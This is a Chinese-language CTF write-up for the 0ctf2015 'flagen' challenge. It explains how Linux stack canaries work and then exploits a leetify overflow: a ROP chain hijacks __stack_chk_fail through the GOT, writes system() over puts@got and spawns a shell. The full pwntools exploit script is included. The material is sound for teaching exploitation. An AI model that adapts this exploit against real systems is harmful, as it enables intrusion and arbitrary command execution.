[exploit][writeup]0ctf2015 flagen - Canary绕过之__stack_chk_fail劫持

本题为Linux栈溢出漏洞的利用,考查Linux Canary绕过技术及ROP(Return-Oriented-Programming)攻击负载的构造。

0x01 Linux Canary介绍
首先了解一下Linux的Canary保护机制。Canary是Linux众多安全保护机制中的一种,主要用于防护栈溢出攻击。我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的函数返回地址来达到劫持程序执行流的目的:

针对此种攻击情况,如果在函数返回之前,我们能够判断ret地址是否被改写,若被改写则终止程序的执行,便可以有效地应对攻击。如何做到呢?一个很自然的想法是在刚进入函数时,在栈上放置一个标志,在函数结束时,判断该标志是否被改变,如果被改变,则表示有攻击行为发生。Linux Canary保护机制便是如此,如下:

攻击者如果要通过栈溢出覆盖ret,则必先覆盖Canary。如果我们能判断Canary前后是否一致,便能够判断是否有攻击行为发生。
说明:上述图例仅用于说明,实际上canary并不一定是与栈上保存的BP地址相邻的。
0x02 Linux Canary实现
Linux程序的Canary保护是通过gcc编译选项来控制的,gcc与canary相关的参数及其意义分别为:
-fstack-protector:启用堆栈保护,不过只为局部变量中含有 char 数组的函数插入保护代码
-fstack-protector-all:启用堆栈保护,为所有函数插入保护代码。
-fno-stack-protector:禁用堆栈保护,为默认选项。
我们通过一个简单的例子来了解一下。示例代码如下:

#include <stdio.h>
#include <string.h>

void foo (char *src)
{
    char dest[48] = {0};
    strcpy (dest, src);
}

int main()
{
    foo("Hello, world!");
    return 0;
}

将该段代码保存为test.c,然后使用如下命令进行编译:

gcc –o test test.c

然后通过如下命令对test进行反编译:

objdump -d ./test

我们得到foo()的汇编代码如下:

 1 080483eb <foo>:
 2  80483eb:    55                       push   %ebp
 3  80483ec:    89 e5                    mov    %esp,%ebp
 4  80483ee:    57                       push   %edi
 5  80483ef:    83 ec 34                 sub    $0x34,%esp
 6  80483f2:    8d 55 c8                 lea    -0x38(%ebp),%edx
 7  80483f5:    b8 00 00 00 00           mov    $0x0,%eax
 8  80483fa:    b9 0c 00 00 00           mov    $0xc,%ecx
 9  80483ff:    89 d7                    mov    %edx,%edi
10  8048401:    f3 ab                    rep stos %eax,%es:(%edi)
11  8048403:    83 ec 08                 sub    $0x8,%esp
12  8048406:    ff 75 08                 pushl  0x8(%ebp)
13  8048409:    8d 45 c8                 lea    -0x38(%ebp),%eax
14  804840c:    50                       push   %eax
15  804840d:    e8 ae fe ff ff           call   80482c0 <strcpy@plt>
16  8048412:    83 c4 10                 add    $0x10,%esp
17  8048415:    90                       nop
18  8048416:    8b 7d fc                 mov    -0x4(%ebp),%edi
19  8048419:    c9                       leave  
20  804841a:    c3                       ret

然后我们使用”-fstack-protector”编译选项重新编译编译:

gcc -o test2 -fstack-protector ./test.c

然后通过相同的命令对test2进行反编译,得到foo()的汇编代码如下:

 1 0804844b <foo>:
 2  804844b:    55                       push   %ebp
 3  804844c:    89 e5                    mov    %esp,%ebp
 4  804844e:    57                       push   %edi
 5  804844f:    83 ec 54                 sub    $0x54,%esp
 6  8048452:    8b 45 08                 mov    0x8(%ebp),%eax
 7  8048455:    89 45 b4                 mov    %eax,-0x4c(%ebp)
 8  8048458:    65 a1 14 00 00 00        mov    %gs:0x14,%eax
 9  804845e:    89 45 f4                 mov    %eax,-0xc(%ebp)
10  8048461:    31 c0                    xor    %eax,%eax
11  8048463:    8d 55 c4                 lea    -0x3c(%ebp),%edx
12  8048466:    b8 00 00 00 00           mov    $0x0,%eax
13  804846b:    b9 0c 00 00 00           mov    $0xc,%ecx
14  8048470:    89 d7                    mov    %edx,%edi
15  8048472:    f3 ab                    rep stos %eax,%es:(%edi)
16  8048474:    83 ec 08                 sub    $0x8,%esp
17  8048477:    ff 75 b4                 pushl  -0x4c(%ebp)
18  804847a:    8d 45 c4                 lea    -0x3c(%ebp),%eax
19  804847d:    50                       push   %eax
20  804847e:    e8 9d fe ff ff           call   8048320 <strcpy@plt>
21  8048483:    83 c4 10                 add    $0x10,%esp
22  8048486:    90                       nop
23  8048487:    8b 45 f4                 mov    -0xc(%ebp),%eax
24  804848a:    65 33 05 14 00 00 00     xor    %gs:0x14,%eax
25  8048491:    74 05                    je     8048498 <foo+0x4d>
26  8048493:    e8 78 fe ff ff           call   8048310 <__stack_chk_fail@plt>
27  8048498:    8b 7d fc                 mov    -0x4(%ebp),%edi
28  804849b:    c9                       leave  
29  804849c:    c3                       ret

我们用beyond compare比较两份汇编代码,可以直观的看到不同:

在右侧代码中可以看到,在函数开始时,会取gs:0x14处的值,并放在%ebp-0xc的地方(mov %gs:0x14,%eax, mov %eax,-0xc(%ebp)),在程序结束时,会将该值取出,并与gs:0x14的值进行抑或(mov -0xc(%ebp),%eax,xor %gs:0x14,%eax),如果抑或的结果为0,说明canary未被修改,程序会正常结束,反之如果抑或结果不为0,说明canary已经被非法修改,存在攻击行为,此时程序流程会走到__stack_chk_fail,从而终止程序。
0x03 Canary保护绕过方法
从Canary的工作机制,可以总结出绕过Canary保护的方法有:

  • 泄露canary。由于Canary保护仅仅是检查canary是否被改写,而不会检查其他栈内容,因此如果攻击者能够泄露出canary的值,便可以在构造攻击负载时填充正确的canary,从而绕过canary检查,达到实施攻击的目的。
  • 劫持__stack_chk_fail。当canary被改写时,程序执行流会走到__stack_chk_fail函数,如果攻击者可以劫持该函数,便能够改变程序的执行逻辑,执行攻击者构造的代码。我们知道,Linux采用的是延迟绑定技术(PLT),如果我们能够修改全局偏移表(GOT)中存储的__stack_chk_fail函数地址,便可以在触发canary检查失败时,跳转到指定的地址继续执行。Linux延迟绑定技术在网络上有很多介绍,请读者自行查阅,这里不做详细的说明。

我们将采用第二种方法对flagen漏洞进行利用。
0x04 漏洞利用策略
主办方提供了一个ELF程序flagen及其对应的Libc.so。在对漏洞进行利用之前,通常需要先看一下目标程序采用了哪些安全机制,以确定采取何种漏洞利用策略。
已经有大牛们为我们写好了工具,一个比较好用的脚本是checksec.sh,下载地址:https://github.com/slimm609/checksec.sh

Kali Linux上已经自带了该脚本,我们使用checksec.sh对flagen进行检查,输出结果如下:

root@gzq:/home/gzq/exploit/flagen# checksec  ./flagen
[!] Pwntools does not support 32-bit Python.  Use a 64-bit release.
[*] '/home/gzq/exploit/flagen/flagen'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE

我们可以看到,这是一个32位ELF程序,RELRO为” Partial RELRO”,说明我们对GOT表具有写权限,Stack为”Canary found”说明程序启用了栈保护,NX Enabled说明开启了数据执行保护(DEP),我们很难通过shellcode来执行代码了,No PIE说明未采用地址空间随机化。
综上,我们的漏洞利用策略是绕过Canary保护,并劫持Libc中的__stack_chk_fail来改变程序执行流,由于程序开启了NX,我们需要构造ROP链来执行我们的代码。
0x05 漏洞分析
用IDA对flagen进行逆向分析,这个题目的漏洞还是比较好找的,漏洞存在于Leetify()函数,该函数会对用户输入的特定字符做转换,比如将’A’和’a’转换为’4’,将’B’和’b’转换为8,同时还会将’H’和’h’转换为’1-1’,如下:

 1 int __cdecl Leetify(char *dest)
 2 {
 3   char *v1; // eax@3
 4   char *v2; // eax@4
 5   char *v3; // eax@5
 6   char *v4; // eax@6
 7   _BYTE *v5; // ST14_4@6
 8   _BYTE *v6; // eax@6
 9   char *v7; // eax@7
10   char *v8; // eax@8
11   char *v9; // eax@9
12   char *v10; // eax@10
13   char *v11; // eax@11
14   char *v12; // eax@12
15   char *v13; // eax@13
16   char *p; // [sp+14h] [bp-114h]@1
17   char *i; // [sp+18h] [bp-110h]@1
18   char src; // [sp+1Ch] [bp-10Ch]@1 256 bytes
19   int v18; // [sp+11Ch] [bp-Ch]@1
20 
21   v18 = *MK_FP(__GS__, 20);
22   p = &src;
23   for ( i = dest; *i; ++i )
24   {
25     switch ( *i )
26     {
27       case 0x41:                                // 'a' 'A' ->'4'
28       case 0x61:
29         v1 = p++;
30         *v1 = 52;                               // '4'
31         break;
32       case 0x42:                                // 'b' 'B' ->'8'
33       case 0x62:
34         v2 = p++;
35         *v2 = 56;                               // '8'
36         break;
37       case 0x45:                                // 'e' 'E' ->'3'
38       case 0x65:
39         v3 = p++;
40         *v3 = 51;                               // '3'
41         break;
42       case 0x48:                                // 'h' 'H'  hXX->1-1
43       case 0x68:
44         v4 = p;
45         v5 = p + 1;
46         *v4 = 49;                               // '1'
47         *v5 = 45;                               // '-'
48         v6 = v5 + 1;
49         p = v5 + 2;
50         *v6 = 49;
51         break;
52       case 0x49:                                // 'i' 'I' ->'!'
53       case 0x69:
54         v7 = p++;
55         *v7 = 33;                               // '!'
56         break;
57       case 0x4C:                                // 'l' 'L' ->'1'
58       case 0x6C:
59         v8 = p++;
60         *v8 = 49;                               // '1'
61         break;
62       case 0x4F:                                // 'o' 'O'->'0'
63       case 0x6F:
64         v9 = p++;
65         *v9 = 48;                               // '0'
66         break;
67       case 0x53:                                // 's' 'S'->'5'
68       case 0x73:
69         v10 = p++;
70         *v10 = 53;                              // '5'
71         break;
72       case 0x54:                                // 't' 'T'->'7'
73       case 0x74:
74         v11 = p++;
75         *v11 = 55;                              // '7'
76         break;
77       case 0x5A:                                // 'z' 'Z'->'2'
78       case 0x7A:
79         v12 = p++;
80         *v12 = 50;                              // '2'
81         break;
82       default:
83         v13 = p++;
84         *v13 = *i;
85         break;
86     }
87   }
88   *p = 0;
89   strcpy(dest, &src);
90   return *MK_FP(__GS__, 20) ^ v18;
91 }

在对’H’和’h’进行转换时,负载将由1个字节变为3个字节,因此字符串长度将增加,在缓冲区未增大的情况下,将会产生溢出。因此如果攻击者构造特定的负载,在调用strcpy()时,就会造成dest缓冲区溢出。
此外还需要注意,由于程序对特定字符进行了转换,因此如果我们构造的攻击负载中含有被转换的字符,将不会达到我们的预期目的,此时需要对上述被转换字符进行适当的变换才可成功。
在执行leetify()函数时,栈结构如下:

其中dest为指向堆缓冲区的指针,在调用leetify()时,其值将被压入栈中,由于该函数存在栈溢出漏洞,攻击者可以利用这个漏洞覆盖掉dest的值为指定地址,在后续调用strcpy()时,实现向任意地址写的目的。
我们可以将dest覆盖为__stack_chk_fail函数在got表中的地址,达到修改__stack_chk_fail函数调用地址的目的,这样后续在调用该函数时,实际上执行的是攻击者的代码。如下:

0x06 漏洞利用
至此,我们的漏洞利用思路已经比较清晰了。首先,需要将dest覆盖为got表中__stack_chk_fail函数对应的表项,这样当调用strcpy(dest, src)时,实际上是将src指向的缓冲区内容拷贝到got[‘__stack_chk_fail’]中,后续在canary检查失败而触发__stack_chk_fail时,实际执行的是src指向的指令。因此我们的攻击负载应该是这样的:

fullpayload = payload + got[‘__stack_chk_fail’]

其中payload长度应该是276字节(ebp + 8 – (ebp - 268))。同时,由于程序开启了NX保护,栈上的内容无法直接执行,因此我们需要构造ROP链来执行我们的指令。
ROP Chain是由一系列的片段(Gadgets)组成的。Kali Linux上的ROPgadget工具可以帮助我们从指定的二进制文件中列出可用的ROP gadget,命令如下:

root@gzq:/home/gzq/exploit/flagen# ROPgadget --binary ./flagen > gadget.txt

在列出的gadgets中,如下两条gadgets可以实现任意地址写的目的:

0x08048d8c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x08048aff : add byte ptr [edi + 0x5d], bl ; ret

第一条gadget从栈中弹出edi和ebx,第二条gadget将edi+0x5d位置的内容加上bx的低字节,由于栈上的内容是我们可以控制的,因此我们可以通过上述两条gadgets实现向指定地址写入指定内容的目的。
通常flag文件是存储在文件系统中的,如果我们能够控制程序执行system(“sh”)的话,我们将会与服务器建立一个shell,从而可以执行任意命令。因此,我们需要在栈上构造如下结构并跳转到这里来执行:

因此需要解决如下两个问题:
1) 计算system()的地址,并部署于栈上
2) 在内存中寻找”sh”字符串,或将该字符写入内存,并将对应的地址部署于栈上
针对第一个问题,由于程序中并未直接调用system(),因此我们无法通过读取got表来获得system()的实际地址,但是由于我们获得了libc.so,而函数的相对偏移是固定的,故我们可以通过读取got表中实际被调用的函数地址来计算system()函数的地址。
首先我们使用如下命令来查看我们可以从got表中获得哪些函数的实际地址:

root@gzq:/home/gzq/exploit/flagen# objdump -R ./flagen

./flagen:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
0804affc R_386_GLOB_DAT    __gmon_start__
0804b060 R_386_COPY        stdin@@GLIBC_2.0
0804b080 R_386_COPY        stdout@@GLIBC_2.0
0804b00c R_386_JUMP_SLOT   read@GLIBC_2.0
0804b010 R_386_JUMP_SLOT   puts@GLIBC_2.0
0804b014 R_386_JUMP_SLOT   free@GLIBC_2.0
0804b018 R_386_JUMP_SLOT   alarm@GLIBC_2.0
0804b01c R_386_JUMP_SLOT   __stack_chk_fail@GLIBC_2.4
0804b020 R_386_JUMP_SLOT   strcpy@GLIBC_2.0
0804b024 R_386_JUMP_SLOT   malloc@GLIBC_2.0
0804b028 R_386_JUMP_SLOT   printf@GLIBC_2.0
0804b02c R_386_JUMP_SLOT   __gmon_start__
0804b030 R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.0
0804b034 R_386_JUMP_SLOT   setvbuf@GLIBC_2.0
0804b038 R_386_JUMP_SLOT   snprintf@GLIBC_2.0
0804b03c R_386_JUMP_SLOT   atoi@GLIBC_2.0

puts()与system()的调用方式是一样的,我们选取puts()函数的实际地址来计算system()函数的地址。那么如何计算呢?我们可以根据libc.so中函数地址每个字节的偏移来计算,用puts()函数地址每字节的值加上偏移即可得到system()的地址。通过上面的两条gadgets,我们可以将system()的地址写入到got表中puts()函数对应的表项中。
这里还有一个问题就是如何跳转到这个地址来执行。通过上述输出我们看到,got表中puts函数存储的地址为0x0804b010,用如下命令将flagen反汇编:

objdump –d flagen > flagen.asm

在反汇编得到的汇编文件中,我们使用” 804b010”进行查找,发现如下代码片段:

08048510 <printf@plt>:
 8048510:   ff 25 10 b0 04 08       jmp    *0x804b010
 8048516:   68 38 00 00 00          push   $0x38
 804851b:   e9 70 ff ff ff          jmp    8048490 <read@plt-0x10>

因此,当调用printf()时,实际上会跳转到got[‘puts’]处存储的地址继续执行。
对于第二个问题,也比较好处理。运行flagen,然后查看其内存映射情况,如下:

root@gzq:/home/gzq/exploit/flagen# ps axu | grep flagen
root      3496  0.3  0.7  28392 16184 pts/1    Sl+  15:44   0:06 /usr/bin/python2 ./flagen-pwn.py
root      3503  0.0  0.0   2200   528 pts/2    ts+  15:44   0:00 ./flagen
root      3510  0.2  1.4  38216 30932 pts/3    Ss+  15:44   0:04 gdb -q /home/gzq/exploit/flagen/flagen 3503 -x /tmp/pwn2fdAkU.gdb ; rm /tmp/pwn2fdAkU.gdb
root      3676  0.0  0.0   4636   856 pts/5    S+   16:12   0:00 grep flagen
root@gzq:/home/gzq/exploit/flagen# cat /proc/3503/maps 
08048000-0804a000 r-xp 00000000 08:08 1179832    /home/gzq/exploit/flagen/flagen
0804a000-0804b000 r--p 00001000 08:08 1179832    /home/gzq/exploit/flagen/flagen
0804b000-0804c000 rw-p 00002000 08:08 1179832    /home/gzq/exploit/flagen/flagen
0955e000-0957f000 rw-p 00000000 00:00 0          [heap]
b759e000-b774b000 r-xp 00000000 08:01 392330     /lib/i386-linux-gnu/libc-2.23.so
b774b000-b774d000 r--p 001ac000 08:01 392330     /lib/i386-linux-gnu/libc-2.23.so
b774d000-b774e000 rw-p 001ae000 08:01 392330     /lib/i386-linux-gnu/libc-2.23.so
b774e000-b7751000 rw-p 00000000 00:00 0 
b776d000-b776f000 rw-p 00000000 00:00 0 
b776f000-b7772000 r--p 00000000 00:00 0          [vvar]
b7772000-b7774000 r-xp 00000000 00:00 0          [vdso]
b7774000-b7796000 r-xp 00000000 08:01 392302     /lib/i386-linux-gnu/ld-2.23.so
b7796000-b7797000 rw-p 00000000 00:00 0 
b7797000-b7798000 r--p 00022000 08:01 392302     /lib/i386-linux-gnu/ld-2.23.so
b7798000-b7799000 rw-p 00023000 08:01 392302     /lib/i386-linux-gnu/ld-2.23.so
bf8df000-bf900000 rw-p 00000000 00:00 0          [stack]
root@gzq:/home/gzq/exploit/flagen#

可以看到,在flagen的进程空间中,0804b000-0804c000区间是可写的,我们在其中选取一个地址来写入”sh;”字符串,比如地址0x804b230,这个地址处的内容应该是全零的,因为我们的gadget是通过“加”的方式写内存的。
至此,我们已经可以编写针对该漏洞的利用代码了。详细的利用代码如下,代码中含有完善的注释信息:

  1 #!/usr/bin/python2
  2 
  3 from pwn import *
  4 
  5 #context.log_level = "debug"
  6 elf = ELF("./flagen")
  7 
  8 print "got['puts']="+hex(elf.got['puts'])
  9 
 10 payload = ""
 11 payload += p32(0x08048d89)        #add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret  !!src is locate at esp+0x1c, so this instruction make esp points to src
 12 payload += p32(0xdeadbeef)*2
 13 
 14 offs={"local":{"first":0x80, "second":0xB8, "third":0xFE}, "remote":{"first":0x00, "second":0xB8, "third":0xFE}, "ubuntu":{"first":0xA0, "second":0xAD, "third":0xFD}}
 15 # In the libc provided, puts() is 0005F140, system() is 0003A940. Following work we do is to write system's address to puts@got
 16 # In the local kali host, puts() is 0005F0D0, system() is 0003A850. Following work we do is to write system's address to puts@got
 17 # In my ubuntu box, puts() is 00060380, system() is 0003B020. Following work we do is to write system's address to puts@got
 18 
 19 #The following two gadgets we can use to write any where
 20 # 0x08048d8c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
 21 # 0x08048aff : add byte ptr [edi + 0x5d], bl ; ret
 22 payload += p32(0x08048d8c)    #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
 23 payload += p32(0xFFFFFF00 + offs['local']['first'])    #ebx, lowest byte is 0x80, 0x80 + 0xD0 = 0x150, so we can change the first byte in puts@got to 0x50 later
 24 payload += p32(0xdeadbeef)    #esi, not useful here, just avoid existing '\x00'
 25 payload += p32(elf.got['puts'] - 0x5d)    #edi
 26 payload += p32(0xdeadbeef)    #ebp, same as esi
 27 payload += p32(0x08048aff)    #add byte ptr [edi + 0x5d], bl ; ret; !!increase the first byte to 0x40
 28 
 29 payload += p32(0x08048d8c)    #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
 30 payload += p32(0xFFFFFF00 + offs['local']['second'])    #ebx, lowest byte is 0xB8, 0xB8 + 0xF0 = 0x1A8, so we can change the second byte in puts@got to 0xA8 later
 31 payload += p32(0xdeadbeef)    #esi, not useful here, just avoid existing '\x00'
 32 payload += p32(elf.got['puts'] + 1 - 0x5d)    #edi
 33 payload += p32(0xdeadbeef)    #ebp, same as esi
 34 payload += p32(0x08048aff)    #add byte ptr [edi + 0x5d], bl ; ret; !!increase the second byte to 0xA8
 35 
 36 payload += p32(0x08048d8c)    #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
 37 payload += p32(0xFFFFFF00 + + offs['local']['third'])    #ebx, lowest byte is FE, 0xFE + 0x05 = 0x03, so we can change the third byte in puts@got to 0x03 later
 38 payload += p32(0xdeadbeef)    #esi, not useful here, just avoid existing '\x00'
 39 payload += p32(elf.got['puts'] + 2 - 0x5d)    #edi
 40 payload += p32(0xdeadbeef)    #ebp, same as esi
 41 payload += p32(0x08048aff)    #add byte ptr [edi + 0x5d], bl ; ret; !!increase the third byte to 0x03
 42 
 43 #By now, we write system()'s address to puts@got successfully.
 44 
 45 #Following we do is to write "sh;"(0x3B6873) to a location in the process memory space where default value is 0x00000000
 46 jcr=0x804b230
 47 
 48 #we can't write 's' directly because 's'(ascii=0x73) will be leetified to '5', so we use 0x01+0x72 to write it
 49 payload += p32(0x08048d8c)    #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
 50 payload += p32(0xFFFFFF01)    #lowest byte 0x01(bl) is useful
 51 payload += p32(0xdeadbeef)    #esi, not useful here, just avoid existing '\x00'
 52 payload += p32(jcr - 0x5d)    #edi
 53 payload += p32(0xdeadbeef)    #ebp, same as esi
 54 payload += p32(0x08048aff)    #add byte ptr [edi + 0x5d], bl ; ret; !!increase the lowest byte, so 0x02 is changed to 0x03
 55 
 56 payload += p32(0x08048d8c)    #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
 57 payload += p32(0xFFFFFF72)    #lowest byte 0x72(bl) is useful
 58 payload += p32(0xdeadbeef)    #esi, not useful here, just avoid existing '\x00'
 59 payload += p32(jcr - 0x5d)    #edi
 60 payload += p32(0xdeadbeef)    #ebp, same as esi
 61 payload += p32(0x08048aff)    #add byte ptr [edi + 0x5d], bl ; ret; !!increase the lowest byte, so 0x02 is changed to 0x03
 62 
 63 ##Also we can't write 'h' directly because 'h'(ascii=0x68) will be leetified to '1-1', so we use 0x01+0x67 to write it
 64 payload += p32(0x08048d8c)    #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
 65 payload += p32(0xFFFFFF01)    #lowest byte 0x01(bl) is useful
 66 payload += p32(0xdeadbeef)    #esi, not useful here, just avoid existing '\x00'
 67 payload += p32(jcr + 1 - 0x5d)    #edi
 68 payload += p32(0xdeadbeef)    #ebp, same as esi
 69 payload += p32(0x08048aff)    #add byte ptr [edi + 0x5d], bl ; ret; !!increase the lowest byte, so 0x02 is changed to 0x03
 70 
 71 payload += p32(0x08048d8c)    #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
 72 payload += p32(0xFFFFFF67)    #lowest byte 0x72(bl) is useful
 73 payload += p32(0xdeadbeef)    #esi, not useful here, just avoid existing '\x00'
 74 payload += p32(jcr + 1 - 0x5d)    #edi
 75 payload += p32(0xdeadbeef)    #ebp, same as esi
 76 payload += p32(0x08048aff)    #add byte ptr [edi + 0x5d], bl ; ret; !!increase the lowest byte, so 0x02 is changed to 0x03
 77 
 78 #we can write ';' directly(ascii=0x3B)
 79 payload += p32(0x08048d8c)    #pop ebx ; pop esi ; pop edi ; pop ebp ; ret
 80 payload += p32(0xFFFFFF3B)    #lowest byte 0x01(bl) is useful
 81 payload += p32(0xdeadbeef)    #esi, not useful here, just avoid existing '\x00'
 82 payload += p32(jcr + 2 - 0x5d)    #edi
 83 payload += p32(0xdeadbeef)    #ebp, same as esi
 84 payload += p32(0x08048aff)    #add byte ptr [edi + 0x5d], bl ; ret; !!increase the lowest byte, so 0x02 is changed to 0x03
 85 
 86 #now we can call system
 87 payload += p32(elf.symbols['printf'])    #call system in fact
 88 payload += p32(0xdeadbeef)     #faked ret address
 89 payload += p32(jcr)            #points to where 'sh;' is locate
 90 
 91 print "len(payload)=%d"%(len(payload))
 92 
 93 #padding, we need 276 bytes to hijack __stack_chk_fail.
 94 hNum = (276 - len(payload))/3
 95 print "hNum=%d"%(hNum)
 96 payload += 'H'*hNum
 97 payload += (276 - len(payload) - 2*hNum)*'A'
 98 print "len(all payload)=%d"%(len(payload))
 99 
100 #we want to overwrite 
101 payload += p32(elf.got['__stack_chk_fail'])
102 
103 p = process("./flagen")
104 #p = remote("5.5.100.35", 7777)
105 #p = remote("5.5.199.3", 4444)
106 
107 p.recvuntil(":")
108 p.sendline("1")
109 p.sendline(payload)
110 p.recvuntil(":")
111 #gdb.attach(p.proc.pid, "b *0x08048A58")
112 p.sendline("4")
113 p.interactive()
114 #p.close()

运行结果如下:

成功建立shell,我们可以读取文件来获得flag。
注意:因为在不同的libc中函数的地址可能不同,在第一部分写system()函数地址的时候,你需要根据实际情况来进行调整, 尤其是当你构造的的负载中含有可被转换字符的时候,需要灵活变换一下,比如如果想写入0x53,因为0x53为’S’会被转换,可以先写入0x52,然后再加上0x01来间接达到写入0x53的目的。
本文章中用到的flagen可以在我的github上下载(https://github.com/gsharpsh00ter/reverse),libc.so取决于运行的环境。文章中如有不正确之处,欢迎大家指正和交流。

posted @ 2017-02-20 16:41  gsharpsh00ter  阅读(7285)  评论(1编辑  收藏  举报